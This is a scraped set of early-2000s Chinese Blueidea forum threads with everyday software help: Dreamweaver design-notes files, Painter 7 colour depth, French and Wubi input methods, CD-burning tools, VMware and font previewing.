 发表于 2002-02-18 10:26:50 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
啸在上个帖子中说
引用:
不过上传的时候挺烦这些文件的，特别是在图片目录里的，差不多每个图片都有一个对应的mno文件，

同步上传MNO文件就是为了保证合作伙伴知道你更新了那些文件啊。
如果你不上传这些东西，对方可能就会认为某些修改是错误的哦

当然，如果你不使用DW的上传功能而使用其他的FTP软件，那么当你上传以前，
你可以重新定义你的站点，选择Design Notes项目，然后Clean Up Maintain Design Notes，
这样，关于一些文件（例如图片）的NOTES就会被清除。

但整个站点的特别信息还是会存在，就是站点根目录下的_notes文件还在。

即使你使用DW的PUT功能，你也可以选择不上传这些NOTES文件的。看看Design Notes项目你就明白了

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-18 10:30:24 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
那不是和没有删一样吗？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-18 10:32:45 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
怎么会呢？如果不清除，就会在很多文件夹下都存在_notes文件夹，
而清除以后就只有一个根目录下的了，你上传的时候完全可以选择不传它啊

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-18 10:43:14 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
不太喜欢用dw的上传功能，特别是在网速慢的时候，整个dw就象死了一样。

我的上传习惯都是把整个网站的文件夹一拖过去了事，所以里面的_notes文件夹特别讨厌，毕竟自己还处于网页制作的手工作坊水平呀

btw:这个主题好象在dw区讨论比较合适

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-02-18 11:36:13 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
我也不喜欢这个 .mno文件，但在局域网，多人开发，还有与 fireworks 联合制作网站时，这个却是必须的。所以我在本地是保留了 design notes的，上传时不传 .mno。期待DW5对这个功能进行增强

以前网站都是用DW来做，所以上传用了 updatenow。DW如果和UPDATENOW整合在一起，真是最幸福的了。

现在很少用dw来做了，并且用了宽带，所以用 ie　上传。

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

上一贴 | 下一贴
管理选项： 开放主题 | 置于顶部 | 移动/归档 | 删除主题

新开主题


急！请用过PAINTER7的朋友帮忙 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
急！请用过PAINTER7的朋友帮忙

上一贴 | 下一贴
发表人 主题: 急！请用过PAINTER7的朋友帮忙
Manson

初级用户
积分：145
发帖：41
来自：
注册：2001-11-20
 发表于 2002-02-21 12:33:20 按此观看Manson的个人资料 按此发邮件给Manson Manson 的 oicq 是5777688,查看 5777688 的资料 收藏该主题供以后查看 发送悄悄话给Manson 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Manson的IP
不知道我装了PAINTER7之后 运行软件 所有的选项都是这样的……

有谁遇到过这样的情况，怎样解决啊

风中穿梭 如影随形
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-21 12:47:09 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

7好象对24位色不支持还是怎么的

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
Manson

初级用户
积分：145
发帖：41
来自：
注册：2001-11-20
 发表于 2002-02-21 12:54:09 按此观看Manson的个人资料 按此发邮件给Manson Manson 的 oicq 是5777688,查看 5777688 的资料 发送悄悄话给Manson 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Manson的IP
可是我用的是16位色模式啊……怎么也这样

风中穿梭 如影随形
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-21 13:45:41 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

上到32位看看

再不行换显卡驱动咯

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
moonbus

林 川
现任版主
积分：2105
发帖：1973
来自：上海
注册：2000-07-31
 发表于 2002-02-21 14:13:41 按此观看moonbus的个人资料 按此发邮件给moonbus 访问moonbus的主页 moonbus 的 oicq 是447277,查看 447277 的资料 发送悄悄话给moonbus 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbus的IP
计算机显示属性调到32位色就对了，16位色是花的

小兄弟，告诉你，我练成冲击波了
上一贴 | 下一贴
快速回复 主题：急！请用过PAINTER7的朋友帮忙
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请教法文的输入方法 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
请教法文的输入方法

上一贴 | 下一贴
发表人 主题: 请教法文的输入方法
jorkof

终级用户
积分：1200
发帖：368
来自：北京
注册：2001-06-16
 发表于 2002-01-27 07:38:06 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 收藏该主题供以后查看 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
请问安装什么输入法就可以输入发问了那？

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-27 13:41:20 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
1、根本方法：安装输入法——大众形音输入法应该就可以，但是我没有安装使用过，所以不是非常清楚
2、懒人方法：COPY喽，呵呵，我输入时候用这个最多了
à á ? ? ? è é ê ? ì ú ? ü ò ó ? ?? ? ? à a ? a á é è ê ì í ? ? ó ? ? ù ? ü ú
软件转COPY——WORD2000的符号会用吧？ 再不来DW大部分总都用的

附：法语键盘与英文键盘的对照
注：上为英文，下为法文
` 1 2 3 4 5 6 7 8 9 0 - =
2 [&] ‘ ( - è _ &ccedil; à ) =

~ ! @ # $ % ^ & * ( ) _ +
无1 2 3 4 5 6 7 8 9 0 ° +

Q W E R T Y U I O P { } |
A Z E R T Y U I O P ¨ &pound; &micro;

q w e r t y u i o p [ ] \
a z e r t y u i o p ^ $ *

A S D F G H J K L : ”
Q S D F G H J K L M %

a s d f g h j k l ; ’
q s d f g h j k l m ù

Z X C V B N M 〈 > ?
W X C V B N ? . / §

z x c v b n m , . /
w x c v b n , ; : !

[这消息被阿修罗飞天舞编辑过(编辑时间2002-01-27 13:42:30)]
[这消息被阿修罗飞天舞编辑过(编辑时间2002-01-27 13:44:07)]
[这消息被阿修罗飞天舞编辑过(编辑时间2002-01-27 13:46:47)]
[这消息被蓝色编辑过(编辑时间2002-01-27 13:50:27)]
[这消息被阿修罗飞天舞编辑过(编辑时间2002-01-27 14:02:12)]

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

上一贴 | 下一贴
快速回复 主题：请教法文的输入方法
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


win2000的五笔加入 - 经 典 论 坛

计算机技术
win2000的五笔加入

上一贴 | 下一贴
发表人 主题: win2000的五笔加入
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-17 18:58:20 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
请问各位高手，在WIN2000中五笔字形输入法如何加入，安了OFFICE2000也无法加五笔输入法，我应怎样加？谢谢！

誓与WIN2000共存
ADSL

终级用户
积分：3027
发帖：685
来自：华尔街
注册：2001-03-06
 发表于 2001-12-17 19:20:49 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
office2000的根目录下有个Msime文件夹，然后点击里面的setup，照着做就可以了

好运永相随
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-17 19:48:49 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
楼上讲的输入法是微软拼音输入法
但是五笔86版和98版都包括在其中

你先安装微软拼音
之后就会出现五笔的安装选项

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-17 20:17:58 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
去下载一个陈桥五笔（智能五笔）很好用的

N神
JILL

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-18 16:30:00 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
多谢上面几位兄弟

誓与WIN2000共存
ayoung

超级用户
积分：410
发帖：161
来自：北京
注册：2000-11-14
 发表于 2001-12-19 15:17:54 按此观看ayoung的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ayoung 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ayoung的IP
风云突变在上个帖子中说
引用:
去下载一个陈桥五笔（智能五笔）很好用的

我现在用的是万能五笔，什么都好，就是在msn上打汉字出问题，而且用的时间长了会出问题。

^忘忧草^幸运草^
上一贴 | 下一贴
快速回复 主题：win2000的五笔加入
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


WIN2000和万能五笔。。。 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
WIN2000和万能五笔。。。

上一贴 | 下一贴
发表人 | 主题: WIN2000和万能五笔。。。
birdbird 初级用户 积分：132 发帖：44 来自： 注册：2001-12-06 | 发表于 2001-12-24 15:19:59 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 请问： 我才装的WIN2000，万能五笔不能用，打出的都是乱码，为什么呢 我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
birdbird 初级用户 积分：132 发帖：44 来自： 注册：2001-12-06 | 发表于 2001-12-25 15:03:49 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 这么惨！没人理我，555。。。 是不是都去过圣诞了！！ 我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
JILL 终级用户 积分：590 发帖：180 来自：沈阳市 注册：2001-12-10 | 发表于 2001-12-26 22:07:30 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP 用OFFICE2000中根目录下的MSISN(单词记不清了)文件夹下的SETUP ,安装微软拼音输入法,王码五输入法加上对号,OK了. 誓与WIN2000共存
vanbasten 初级用户 积分：7 发帖：3 来自：广西壮族自治区梧州市 注册：2001-11-20 | 发表于 2001-12-27 20:35:55 按此观看vanbasten的个人资料 按此发邮件给vanbasten 访问vanbasten的主页 vanbasten 的 oicq 是66488861,查看 66488861 的资料 发送悄悄话给vanbasten 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看vanbasten的IP 可以装五笔for win2000 我是新手，请多多指教。
上一贴 | 下一贴
快速回复 主题：WIN2000和万能五笔。。。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


请推荐：刻盘用什么软件 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
请推荐：刻盘用什么软件

上一贴 | 下一贴
发表人 主题: 请推荐：刻盘用什么软件
CrazyParty

群山之巅
积分：2491
发帖：922
来自：温州
注册：2000-10-14
 发表于 2001-12-19 09:19:20 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
是用CDRW刻CDR，要速度最快的，谢谢。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2001-12-19 09:35:40 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
Easy Creator
Nero

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2001-12-19 10:56:19 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
管你是CDR还是CDRW，用最经典的刻录软件就好了，楼上的选择绝对是正确的，既专业又容易上手，你可以试试。

至于刻录的速度，呵呵，那决定于你刻录机的速度了，想快一点，去换个最新的吧，呵呵。

上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
西门吹牛

终级用户
积分：692
发帖：283
来自：杭州
注册：2000-09-29
 发表于 2001-12-19 13:23:40 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
WinOnCD 3.8 Power Edition比较不错

我将一直寻找下去......
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-19 14:31:07 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
速度最快----->Adeptec DirectCD 5.0

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

风灵

初级用户
积分：74
发帖：23
来自：GZ.GD.CN
注册：2001-08-25
 发表于 2001-12-19 14:41:16 按此观看风灵的个人资料 按此发邮件给风灵 访问风灵的主页 发送悄悄话给风灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风灵的IP
Clone CD 复制盘片的绝对选择！ ;)

灵感随风！
ArTooL.NeT
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2001-12-19 14:43:56 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
POPOEVER在上个帖子中说
引用:
速度最快----->Adeptec DirectCD 5.0

这个好像在2000server下面装不上？

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2001-12-19 16:57:57 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
Nero + CDRWIN

木有签名#@$%
上一贴 | 下一贴
快速回复 主题：请推荐：刻盘用什么软件
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


VMware 模拟器 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
VMware 模拟器

上一贴 | 下一贴
发表人 主题: VMware 模拟器
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 03:06:02 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 收藏该主题供以后查看 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP

看到了么
在Win2000中以窗口方式运行的Win98

模拟软件VMware
可在 http://www.vmware.com 获得
允许在Windows平台模拟98、95、2000、XP、Liunx、OS/2、FreeBSD
由于这是硬件模拟器
因此所模拟出来的系统是真正的系统

模拟器开机后可进行BIOS设置

在DOS方式下格式化C:
所看到的C:实际上是在现有硬盘上建立的一个文件
如果你划分给模拟器1G的硬盘空间
那么实际上相当于在本机硬盘上建立了一个1G的文件

开始安装Windows 2000

安装了一半的时候

模拟出来的系统可以通过本机的网络连接上网
还可以与本机组成局域网结构共享文件
随着硬件技术的发展
模拟器唯一的瓶颈—速度
会得到改善的

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 16:48:46 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
不错，初一看，我还以为是远程控制呢。

态度决定一切

Blueidea Web Team
Team Member

darkvn

小混蛋
现任版主
积分：8295
发帖：2581
来自：不是外星
注册：2001-03-02
 发表于 2001-12-19 16:52:49 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
好家伙，有意思。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
我的网站改版啦！==>vnv2
jdom

初级用户
积分：0
发帖：5
来自：上海
注册：2001-12-19
 发表于 2001-12-19 17:17:34 按此观看jdom的个人资料 按此发邮件给jdom 发送悄悄话给jdom 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdom的IP
只要硬件支持, 有足够的硬盘空间, 足够的Ram, 可以安装n个操作系统
什么Linux,...Win3.1, Win95, Win98, WinMe, WinNT, Win2000...

从明天起, 做一个幸福的人
喂马, 劈柴, 周游世界
从明天起, 关心粮食和蔬菜
我有一所房子, 面朝大海, 春暖花开

从明天起, 和每一个亲人通信
告诉他们我的幸福
那幸福的闪电告诉我的
我也将告诉每一个人

给每一条河每一座山取一个温暖的名字
陌生人, 我也为你祝福
愿你有一个灿烂的前程
愿你有情人终成眷属
愿你在尘世获得幸福
我也愿面朝大海, 春暖花开

上一贴 | 下一贴
快速回复 主题：VMware 模拟器
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


对了,安装字体有什么软件可以预览字体吗? - 经 典 论 坛

计算机技术
对了,安装字体有什么软件可以预览字体吗?

上一贴 | 下一贴
发表人 主题: 对了,安装字体有什么软件可以预览字体吗?
frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
 发表于 2001-11-05 23:32:17 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 收藏该主题供以后查看 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
由于我的箭头的问题,有人说是用特殊的字体来写的,有各种各样的箭头.我突然想起来,确实有些字体可以出现很多奇怪的符号,可是装字体不知道这个字体是什么样子的,而且通常一个字体都3m左右,十分庞大,有没有什么办法可以先浏览一下字体,觉得那个好就装那个,这多好,acdsee可以,但是我感觉效果不是很好,速度很慢,而且经常出现错误,大家有什么更好的办法?

我总是和孤独的人一起孤独
http://www.lonelycat.tk
菜菜子

肥皂泡泡
积分：3398
发帖：1646
来自：上海
注册：2000-08-10
 发表于 2001-11-06 09:26:20 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
coreldraw的安装盘里面有一个叫fontNav的软件就是预览字体的。

梧桐身旁的浮云里飘出一弯熟悉的月光，轻轻淡淡的月光静静地散落在我的身上

--熙宁街43号--

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-11-06 11:00:19 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
frankwuhong在上个帖子中说
引用:
由于我的箭头的问题,有人说是用特殊的字体来写的,有各种各样的箭头.我突然想起来,确实有些字体可以出现很多奇怪的符号,可是装字体不知道这个字体是什么样子的,而且通常一个字体都3m左右,十分庞大,有没有什么办法可以先浏览一下字体,觉得那个好就装那个,这多好,acdsee可以,但是我感觉效果不是很好,速度很慢,而且经常出现错误,大家有什么更好的办法?

这里吧~很多都能预览

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

leesan

终级用户
积分：463
发帖：204
来自：
注册：2001-01-12
 发表于 2001-11-06 16:08:00 按此观看leesan的个人资料 按此发邮件给leesan leesan 的 oicq 是1099196,查看 1099196 的资料 发送悄悄话给leesan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看leesan的IP
有专门的字体管理工具，你搜一下
飞扬

逆风飞扬
艺设版主
积分：2568
发帖：2750
来自：经典.北京
注册：2000-11-09
 发表于 2001-11-06 17:28:59 按此观看飞扬的个人资料 按此发邮件给飞扬 访问飞扬的主页 飞扬 的 oicq 是762784,查看 762784 的资料 发送悄悄话给飞扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞扬的IP
装一个插件,用ACDSEE也可以和看图一样的看!

现在找不到了这个插件

啊 . 咪 . 哩 . 哟 . 哎 . 吗 . 哈 . 呀 . 哦 . 咦 . 嚓 . 唙 . 嘻 . 啦

念满十遍，你在经典论坛的名字将会闪光！

danger

|危险|男|
积分：4766
发帖：4642
来自：}Earth{
注册：2001-06-15
 发表于 2001-11-06 18:32:26 按此观看danger的个人资料 按此发邮件给danger 访问danger的主页 danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看danger的IP
这里

Go To Detail Page for PHP server model.
http://www.blueidea.com/user/danger/Go_To_Detail_Page.mxp

Blueidea Web Team
Moderator Of Flash forum

frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
 发表于 2001-11-07 08:45:50 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
我下载了，怎么用呀！！！！！！！！！！！！！！！！！

我总是和孤独的人一起孤独
http://www.lonelycat.tk
danger

|危险|男|
积分：4766
发帖：4642
来自：}Earth{
注册：2001-06-15
 发表于 2001-11-07 08:50:32 按此观看danger的个人资料 按此发邮件给danger 访问danger的主页 danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看danger的IP
frankwuhong在上个帖子中说
引用:
我下载了，怎么用呀！！！！！！！！！！！！！！！！！

怎么用还用我说吗？
有什么不懂发邮件给我吧！

Go To Detail Page for PHP server model.
http://www.blueidea.com/user/danger/Go_To_Detail_Page.mxp

Blueidea Web Team
Moderator Of Flash forum

frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
